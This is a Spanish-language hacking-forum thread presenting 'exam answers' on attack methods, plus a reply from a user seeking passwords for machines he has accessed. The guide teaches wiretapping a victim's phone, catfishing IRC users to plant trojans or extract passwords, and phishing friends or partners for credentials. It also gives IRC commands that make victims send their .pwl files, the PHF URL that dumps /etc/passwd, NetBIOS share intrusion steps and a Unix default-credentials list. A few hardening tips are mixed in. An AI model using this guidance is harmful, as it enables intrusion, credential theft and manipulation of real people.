Programa que captura todos los paquetes que pasan por una determinada
Red. Almacenando la información que sea requerida por nosotros.
* Es conveniente revisarlos cada cierto tiempo ya la información almacenada
puede ser demasiada.


PINCHAR LINEAS: PINCHADO DE LINEAS
Consiste en pelar el cable del teléfono de nuestra victima y luego sacar una
línea uniendo los cables que pelastes ( que son 2) a los que tuyos para así
poder gravas las conversaciones.


INGENIERIA SOCIAL: INGENIERIA SOCIAL
Si la puedes manejar bien, puede ser una de las efectivas. Es muy fácil de usar
y muy eficaz a la vez, solo va a depender del ingenio con que uno la lleve a
cabo.
Es importante que:
- Tengas claro lo que quieres conseguir y como lo llevaras a cabo. (algo así
como un plan de ataque)                             
- Seas agradable y trates de convertirte en alguien de confianza, se paciente
(con el o ella).
- debes tratar de conocer al máximo a tu victima, para así saber de alguna forma
como piensa, como reaccionara ante un determinado suceso, “si juegas ajedrez tal
vez entiendas la idea”. Para así saber cual es el momento indicado para atacar
- No te fíes de nadie, sobre todo en el irc, por que nadie es lo que aparenta
ser.


IRC: IRC
Un buen lugar para conseguir un número telefónico o un password, el que después
podrías utilizar para ing.social.
¿Quien debo ser?                                                                             
- Si la victima es un chico, tu tienes que ser una chica, y no, pues al revés.
- Debes ser: simpático, alegre, romántico(a)                             
- debes hacer que se sienta superior a ti
-Consíguete una foto, para poder dársela y que se fíe cada vez mas de ti,
inventante tu nombre,
  Los apellidos, ciudad etc etc 
Una vez que ya te hallas ganado su confianza puedes meterle un troyano o
simplemente pidele los password inventando una buena excusa para ello, también
puedes confeccionarte un exploit de acuerdo a los intereses de tu victima a la
que ya conocerás bien.
Puedes intentar que ingresar en su promt alguno de estos comandos:                             
- /msg nickserv kill   - Quita el registro a su nick (por si te interesa hacerte
pasar por el)
- /send c:\windows\*.*pwl tu_nick   - Te manda sus archivos pwl                             
- /fserve tu_nick 5 c:\   - Abre un fserver en su ordenador 


TELEFONO: TELEFONO
Lo primero: marca delante el 067+  para líneas RTB y *31# o #31#  para RDSI o
GSM.
- Hablar con una voz firme, elegante, segura, muy seria, para lo cual tendrás
que haber ensayado con anticipación
- Antes de hacer la llamada debemos apuntar o memorizar todas las cosas que
debemos decir,
  Para así estar preparados ante todas sus posibles respuestas.                             
- Tienes que ser lo suficientemente convincente para que no desconfíe de ti


INGENIERIA SOCIAL POR MAIL: INGENIERIA SOCIAL POR MAIL
Usada preferentemente para sacar password de personas especificas, un amigo, la
polola(o) etc.
Para esto lo mas fácil es el uso de los exploit y con la ayuda de un programa
que te de la posibilidad de enviar correos anónimos alterando su lugar de
procedencia ej: puedes enviar un exploit a una cuanta de Hotmail informándole a
tu victima que su cuenta no es segura ya que el servidor ha sido hacheado y que
ingrese los datos que se le piden para protegerla de posibles ataques ( entre
los datos que le pedirás estará el campo en que ella tendrá que cambiar su
contraseña la cual te llegara a ti )
Con este método es muy difícil que te pillen por lo que es muy recomendable.


FAKE MAIL: FAKE MAIL
Este es el arte de mandar mensajes, a nombre de otro persona. El problema es que
cuando nos
manden el mensaje, ira al email de esa otra persona. Lo cual podría solucionarse
adjuntando una nota pidiendo la respuesta a un email específico


ATAQUES REMOTOS EN WIN: ATAQUES REMOTOS EN WIN
Con un buen troyano es recomendable, que no sea detectado por los antivirus 


FUERZA BRUTA: FUERZA BRUTA
Consiste en probar todas las combinaciones posibles de password, si conoces el
nombre de usuario o probando tanto nombre de usuario como contraseñas posibles
para ingresar a un lugar restringido. Un buen programa para esta tarea es el
Brutus.


CABALLOS DE TROYA: CABALLOS DE TROYA
Son aquellos que luego de haber instalado parte de ellos nos permiten ingresar
al ordenador donde fueron instalados


MAIL BOMBING: MAIL BOMBING
Consiste en bombardear una cuenta de correo con
montones de mails, mientras mas pesados mejor. Lo único que se puede conseguir
con este método es que se inhabilite el mail por un periodo de tiempo


NETBIOS]: NETBIOS
Resulta útil para acceder a una red de Windows, que no este configurada
correctamente.                                                                                           
Para eso debemos tener instalados en Panel de control/red los siguientes
protocolos:
- Compartir ficheros e impresoras en redes de Microsoft                             
- Cliente para redes Microsoft                                                         
- El inicio de la sesión tiene que estar en "Cliente para redes Microsoft"
Para usar tan solo debemos saber la IP de la victima, y que su red no este muy
bien configurada.
Una vez que este todo correctamente configurado abrimos una ventana de MS-DOS, y
ponemos:
c:\>nbtstat -A (ip de la victima)                                                         
y nos saldrá algo como:
    Name                               Sufijo                            Tipo                               
Status
    ----------------------------------------------------------------
Maquina-remota                 <00>                            UNIQUE                     
Registered
MaquinaGrupo                   <00>                            GROUP                       
Registered
Maquina-remota                 <03>                            UNIQUE                     
Registered
Maquina-remota                 <20>                            UNIQUE                     
Registered
Maquinagrupo                    <1E>                           GROUP                       
Registered                                                         
EL unique 00, nos dice el nombre de la maquina.                             
Ahora para saber que recursos comparte la maquina ponemos:                             
c:\>net view \\Maquina-remota                             
y nos saldra una lista con todo lo que comparte.                             
Ahora haciendo uso de esa lista, ya solo nos queda movernos por su disco duro,
como si
del nuestro se tratara.                                                         
Para añadir esa maquina a nuestro netbios ponemos:                             
c:\>NBTSTAT -R                                                         
EL problema de usar este ultimo comando, es que la maquina remota, tendrá mas
facilidad para
pillarnos, por eso no es muy aconsejable hacerlo.                             
Aunque, es difícil que nos pillen puede ocurrir perfectamente, pero como solo se
necesita el
Windows y una configuración sencilla


FLOODING: FLOODING
Sirve para bloquear los diversos servicios de un ordenador saturándolos con
peticiones de datos.


NUKEO: NUKEO 
Mandar mensajes ICMP y TCP para  hacer resetearla conexiones de diversos
puertos.
* ping de la muerte


AGUJEROS DE SEGURIDAD: AGUJEROS DE SEGURIDAD 
es uno de los métodos mas usados , aunque medio fortuito de lograr lo esperado.
Pero nada se pierde con probar  ya que siempre nos encontramos con pags. Con
algún root que no lleva las actualizaciones diarias.
Los bugs mas famosos son el del PHF que consiste en introducir una línea de
texto a la url,
que pide los archivos de password.                                                         
Esa línea es: /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd


ATAQUES Y SEGURIDAD EN UNIX: ATAQUES Y SEGURIDAD EN UNIX
Pude ser algo muy difícil para un intruso acceder a este sistema, o al contrario
muy fácil, lo cual va depender de la administración que tenga este.


SEGURIDAD  BASICA EN UNIX: SEGURIDAD BASICA  EN UNIX
Cerrar todos los servicios que no ocupemos, estar actualizando en forma
periódica y contar con un buen firewall.


SERVICIOS: SERVICIOS
Debemos cerrar los servicios que no ocupemos , lo cual lo podemos hacer editando
el archivo inetd.conf . como hay puertos que no podemos cerrar es recomendable
usar un firewall 


PERMISOS: PERMISOS
Los directorios como como /root y /home/xx deben tener modo 750 y otros como
/etc /bin...
deben estar en modo 750 además debemos revisar los archivos con suid o gid
activos,
a un archivo que tenga el suid activo conviene añadirle
el sticky bit (para directorios etc..) para que solo pueda modificarlo el
propietario. También recomendable ejecutar el comando $ find / -perm 4000 -o
-perm 2000 para realizarles un seguimiento


PASSWORDS: PASSWORDS
Es aconsejable que los password sean largos y que contengan diversos caracteres


MONITORIZACION DEL SISTEMA  Y REVISION DE  LOGS: MONITORIZACION DEL SISTEMA  Y
REVISION DE  LOGS
Este trabajo puede ser hecho por medio de  sniffers o por el uso de tcpdump  es
recomendable
revisar los logs referentes a los logins fallidos.


MEDIDAS ADICIONALES: MEDIDAS ADICIONALES
Tener instalado un firewall,  realizar copias de seguridad en forma periódica,
eliminar las cuentas por defecto.


ATAQUES TIPICOS A SISTEMAS UNIX: ATAQUES TIPICOS A SISTEMAS UNIX
Pueden ser mediante una shell crackeada , mediante ataques remotos o nukes


ATAQUES REMOTOS: ATAQUES REMOTOS
Son todos aquellos que se llevan a cabo desde máquinas no pertenecientes a una
red


DENIAL OF SERVICE Y NUKES: DENIAL OF SERVICE Y NUKES
Consiste en colapsar una maquina remota con el objetivo de hacerla caer , un
ejemplo puede ser el Ping de la Muerte que se produce enviando un paquete de
ICMP ilegalmente grande que causa desbordamiento en los buffers en la pila TCP
en el receptor y causa estragos


OBTENCION DE SHELL MEDIANTE CRACKEO: OBTENCION DE SHELL MEDIANTE CRACKEO
Se puede lograr ingresando a un sistema como guest y tomar el archivo passwd,
una vez que este en nuestro poder, comenzar a crackearlo con el John the Ripper
que hasta donde entiendo es el mas rápido


SNIFFING Y KEY RECORDING: SNIFFING Y KEY RECORDING
El sniffing puede ser un ataque remoto o bien local, en donde el atacante
instala un programa
que loggea el trafico de red, sacando información de esta como contraseñas
El key recording , es lo mismo que los keyloggers el cual consiste en instalar
un programa que logea todo lo que el usuario teclea.


CUENTAS POR DEFECTO: CUENTAS POR DEFECTO
Son cuantas que vienen creadas por defecto en nuestro sistema.
Ej: en Unix 
root          root 
root          system
sys           sys   
sys           system
daemon   daemon
uucp        uucp
tty            tty
test          test
unix        unix
unix        test
bin             bin 
adm           adm
adm           admin
admin        adm
admin        admin
sysman      sysman
sysman      sys
sysman      system
sysadmin   sysadmin
sysadmin   sys
sysadmin   system
sysadmin   admin
sysadmin   adm
who           who
learn          learn
uuhost       uuhost 
guest         guest
host           host
nuucp        nuucp
rje              rje
games       games
games       player
sysop        sysop 
root           sysop
demo        demo 


ATAQUES LOCALES: ATAQUES LOCALES
Por ataques locales entendemos todos aquéllos que tienen lugar desde nuestra
propia red, aunque su origen pueda estar lejos de ella , con el propósito de
conseguir el máximo de privilegios y lograr hacerse de root.


EXPLOITS: EXPLOITS
Son ocupados por personas con muy poco conocimiento acerca de unix . los exloit
son programas que exploran algún bug (error, fallo) que pueden ser vulnerable


TROYANOS Y DEMAS: TROYANOS Y DEMAS
Programa que nos permite ingresar a un sistema con muchos privilegios


ATAQUES "MANUALES: ATAQUES "MANUALES"
Es todo ataque en el que no se ocupan herramientas, los que son llevados a cabo
por personas de alto conocimiento en informática los que aprovechan los bugs o
la mala configuración de sistema
Historia y conciencia
El uso del internet ( proyecto) se remonta hacia la segunda guerra mundial en
donde este privilegio solo lo tenia el ejercito , luego con el fin de esta se
hizo conocido y se derivo a las universidades y luego a la clase alta de la
sociedad, hasta que con el tiempo fue algo accesible a la mayoría de las
personas


Historia y conciencia: HISTORIA Y CONCIENCIA
El uso del internet ( proyecto) se remonta hacia la segunda guerra mundial en
donde este privilegio solo lo tenia el ejercito , luego con el fin de esta se
hizo conocido y se derivo a las universidades y luego a la clase alta de la
sociedad, hasta que con el tiempo fue algo accesible a la mayoría de las
personas


¿Que es el Cracking?: QUE ES CRACKING
Es la forma de desproteger un programa que se nos entrega en forma de una demo
para que después tengamos que pagar al autor por la key que nos permite el uso
del programa en forma completo.



Tipos de proteccion: TIPOS DE PROTECCION
Las mas conocidas son:
* por tiempo (dias, horas)
* por cantidad de ejecuciones
* por codigo de registro
estos se pueden complementar con un anti-crackar


Know your enemy: KNOW YOUR ENEMA
Consiste en tratar de conocer al máximo a la persona a la cual quieremos
suplantar, estudiar sus actitudes , sus reacciones ante determinados casos ,
como piensa ,etc.


Como contabilizar el volumen de informacion que se nos escapa: Como contabilizar
el volumen de información que se nos escapa
Es mucho más fácil conocer a una persona cuando la tienes frente a ti que cuando
esta del otro lado de una computadora, es aquí en donde tenemos que ingeniarnos
la forma de sacarle la máxima información sin que nosotros entreguemos mucha o
entregarle información falsa que sea de su agrado.


Como suplantamos una personalidad de una edad determinada: Como suplantamos una
personalidad de una edad determinada:
Para lograr esto primero debemos estudiar el comportamiento de una persona de la
edad que quieremos suplantar, por lo que tendremos que relacionarnos lo maximo
posible con gente de la edad que quieremos suplantar


Como copiamos una forma de pensar?: COMO COPIAMOS UNA  FORMA DE PENSAR
Para esto hay que ser un gran observador, fijarse en las actitudes, formas de
comunicarse, ensayar bastante, seria muy útil que si quieres suplantar a una
persona Ej: una mujer (con el objeto de sacar información a algún hombre). Luego
de basarte en las actitudes de una mujer que conozcas, coloques en práctica para
ver como estas para comenzar con tu verdadero objetivo, puedes probar esto en un
Chat haciéndote pasar por mujer  (lo importante es que después lo puedas
controlar) no te la creas jajaja   


Como actuamos?: Como actuamos
Una vez que hemos estudiado a la persona y que tengamos hecho algo parecido a su
perfil psicológico de ella solo nos queda meternos en esa personalidad  para
poder suplantarla.


El interlocutor silencioso : El interlocutor silencioso
Consiste en dejar que la victima nos entregue información sin que seamos
nosotros los que forcemos a hacerlo, si cada vez que nos escribe nos demoramos
unos segundos en responderle veras como nos va entregando información


Mensaje A Personas Que Leeran Tu Mensaje: 

SugerenciasPara: Istoadz
bandido958  @hotmail.com
« Última modificación: Agosto 07, 2008, 07:33:46 por (¯°»¦«¤ Ave de Fuego ¤»¦«°¯) » En línea
el esquimal
Visitante
« Respuesta #5 en: Noviembre 07, 2005, 06:39:43 »

hola,soy un poco  nuevo en este tema y lo que prove es con recursos compartidos y me salio bastante bien ,pero bien uno siempre quiere mas y lo que me gustaria saber si hay algun metodo mara usar  ya que en algunas maquinas me pedian contraseñas si hay alguna forma de poder sacarlas o si existen otros  metodos (cuales) que no sean troyanos por ej. si existe la posibilidad de los puertos o algo el tema es saber eso ya que consegui varias  ip de maquinas  espero no molestar con las preguntas pero bueno sin preguntar no se puede aprender .
Saludos
« Última modificación: Agosto 07, 2008, 07:33:22 por (¯°»¦«¤ Ave de Fuego ¤»¦«°¯) » En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Cursos y Ezines  |  Tema: Respuestas Al 1er Mini Examen « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC